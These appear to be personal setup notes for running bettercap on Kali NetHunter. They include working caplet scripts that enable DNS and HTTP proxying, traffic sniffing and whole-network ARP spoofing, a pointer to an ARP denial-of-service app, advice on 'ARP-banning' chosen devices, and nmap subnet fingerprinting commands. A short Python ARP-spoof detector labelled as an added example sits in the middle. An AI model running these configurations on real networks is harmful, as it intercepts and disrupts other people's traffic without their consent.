# Kali Nethunter

These notes cover bettercap and the surrounding tooling setup on Kali NetHunter.

## Network-wide ARP DOS attack

Use the deadnet APK: flashnuke/deadnet

## Install bettercap with ui support

The bettercap UI isn't installed by default, but installing it also pulls in bettercap itself, so install the UI package right away:

```sh
apt install bettercap-ui
```

## Bettercap sniffing & targeting

Important: make sure no local VPN-style app (AdAway, for example) routes traffic through the loopback interface. This interferes with bettercap and it won't work.

Kali NetHunter must be installed (requires root).

## Unable to find gateway fix

Sometimes you will see the message `unable to find gateway`.

Most of the time the gateway is x.x.x.1.

The fix is to add this to ~/.zshrc:

```sh
# Auto-detect subnet and set default gateway for wlan0
fixgw() {
    # Grabs the first 3 sections of your IP (e.g., 192.168.1); -P needs GNU grep
    SUBNET=$(ip -4 addr show wlan0 | grep -oP '(?<=inet\s)\d+(\.\d+){2}' | head -n 1)

    if [ -n "$SUBNET" ]; then
        # Silently try to add the .1 gateway (fails harmlessly if a default route exists)
        ip route add default via "${SUBNET}.1" dev wlan0 2>/dev/null
    fi
}
# Run it automatically when you open a terminal
fixgw
```

This sets the default gateway to the correct IP automatically.

## Messed up redirections

When you run `dns.proxy on` or `http.proxy on`, it can fail.

You can see the reason for the failure by running `set log.debug true` before the command.

If the error says the redirection already exists, a previous bettercap run didn't unregister its iptables redirect rules before exiting, and they now conflict with the new instance.

To fix it, flush iptables. Don't worry, this won't mess up your phone, because iptables rules live in memory only: a reboot or reconnecting to the network recreates the basic rules. (Although it didn't mess with my internet without even reconnecting to the AP.)

```sh
# Flush standard firewall rules
iptables -F
iptables -X

# Flush the NAT (Network Address Translation) rules where the proxy gets stuck
iptables -t nat -F
iptables -t nat -X

# Flush the mangle table just in case
iptables -t mangle -F
iptables -t mangle -X
```

To get a clean launch of bettercap every single time, add this function to ~/.zshrc and use bcap instead of bettercap.

The other option is to do the same cleanup from a bettercap caplet instead.

```sh
# Flush iptables and launch bettercap cleanly
bcap() {
    echo "[*] Flushing orphaned iptables rules..."
    iptables -F 2>/dev/null
    iptables -X 2>/dev/null
    iptables -t nat -F 2>/dev/null
    iptables -t nat -X 2>/dev/null
    iptables -t mangle -F 2>/dev/null
    iptables -t mangle -X 2>/dev/null

    echo "[*] Resetting IP forwarding..."
    echo 0 > /proc/sys/net/ipv4/ip_forward 2>/dev/null

    echo "[*] Starting Bettercap on wlan0..."
    bettercap -iface wlan0 "$@"
}
```

## Custom HTTP ui port

```sh
sudo nano /usr/share/bettercap/caplets/http-ui.cap
```

Change the HTTP port (81 is fine): `set http.server.port 81`.

## Sniff everything bettercap caplet

This starts the UI and sniffs everything.

The UI is then reachable at http://127.0.0.1:81 with the default credentials:

  • user: user

  • pass: pass

You can use the Hermit Android app to wrap it in a simple borderless "app".

Warning: Don't use `https.proxy on`!! It is very loud, and it won't work unless the target has a custom certificate authority installed on the phone.

Caplets can be launched via:

```sh
bettercap -caplet <caplet>
```

Create the script with `nano bettercap-sniff-everything.js`:

```js
run("http-ui")
run("net.probe on")
run("dns.proxy on")

run("set http.proxy.port 8085")
run("http.proxy on")
run("events.ignore net.sniff.mdns")
run("events.ignore endpoint.new")
run("events.ignore endpoint.lost")
run("events.ignore zeroconf.service")
run("net.sniff on")
run("arp.spoof on")
```

To launch it, create a custom NetHunter command:

```sh
bcap -script bettercap-sniff-everything.js
```
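From the other side of the wire, an added example that is not part of these notes or of bettercap: a small Python check that compares two `ip neigh show` snapshots taken on a client and flags what `arp.spoof on` looks like to a victim, namely a gateway whose MAC changed and one MAC that now answers for several IPs. The two snapshots are constructed sample data; the gateway address and interface name are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: two `ip neigh show` snapshots from a client on 192.168.1.0/24.
# In the second one the gateway and a peer both resolve to the MAC of .50, which
# is the signature of an ARP spoof in progress.
BEFORE = """\
192.168.1.1 dev wlan0 lladdr aa:bb:cc:00:00:01 REACHABLE
192.168.1.20 dev wlan0 lladdr aa:bb:cc:00:00:20 STALE
192.168.1.50 dev wlan0 lladdr aa:bb:cc:00:00:50 REACHABLE
"""
AFTER = """\
192.168.1.1 dev wlan0 lladdr aa:bb:cc:00:00:50 REACHABLE
192.168.1.20 dev wlan0 lladdr aa:bb:cc:00:00:50 REACHABLE
192.168.1.50 dev wlan0 lladdr aa:bb:cc:00:00:50 REACHABLE
"""

# <ip> dev <iface> lladdr <mac> <state ...>; entries without lladdr (FAILED) are skipped
NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-fA-F:]{17})\b")


def parse_neigh(text):
    """Return {ip: mac} from `ip neigh show` output."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def detect_spoof(before, after, gateway):
    """Compare two neighbour snapshots and return a list of (kind, detail) findings."""
    findings = []
    old, new = parse_neigh(before), parse_neigh(after)
    # 1. The gateway's MAC changed between snapshots.
    if gateway in old and gateway in new and old[gateway] != new[gateway]:
        findings.append(("gateway_mac_changed", (old[gateway], new[gateway])))
    # 2. One MAC now claims several IPs (someone impersonating gateway and targets).
    by_mac = defaultdict(list)
    for ip, mac in new.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("mac_claims_multiple_ips", (mac, sorted(ips))))
    return findings


if __name__ == "__main__":
    for kind, detail in detect_spoof(BEFORE, AFTER, "192.168.1.1"):
        print(kind, detail)
```

On a real device, feed it the output of `ip neigh show` taken a few seconds apart; a clean network yields no findings.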

## Prepare for sniffing but don't spoof yet

This is better for targeted attacks, not loud whole-network ones.

With this you can also ARP-ban a subset of the network.

It can be very powerful for actively sniffing or blacklisting specific devices.

This is especially powerful if you have aliases for the devices.

For OS and service discovery, refer to the NMAP snippets.

A simple snippet to identify the OS and fingerprint the name/type of each device:

```sh
nmap -O -sS -sV -vvvv 192.168.1.0/24
nbtscan 192.168.1.0/24
nmap -sU -sS --script smb-os-discovery.nse -p U:137,T:139 192.168.1.0/24
nmap -sV --script=broadcast-upnp-info -T4 -vvvv 192.168.1.0/24
```
Create the script with `nano ./bettercap-prepare-sniff.js`:

```js
run("http-ui")
run("net.probe on")
run("dns.proxy on")

run("set http.proxy.port 8085")
run("http.proxy on")
run("events.ignore net.sniff.mdns")
run("events.ignore endpoint.new")
run("events.ignore endpoint.lost")
run("events.ignore zeroconf.service")
run("net.sniff on")
```

To launch it, create a custom NetHunter command:

```sh
bcap -script bettercap-prepare-sniff.js
```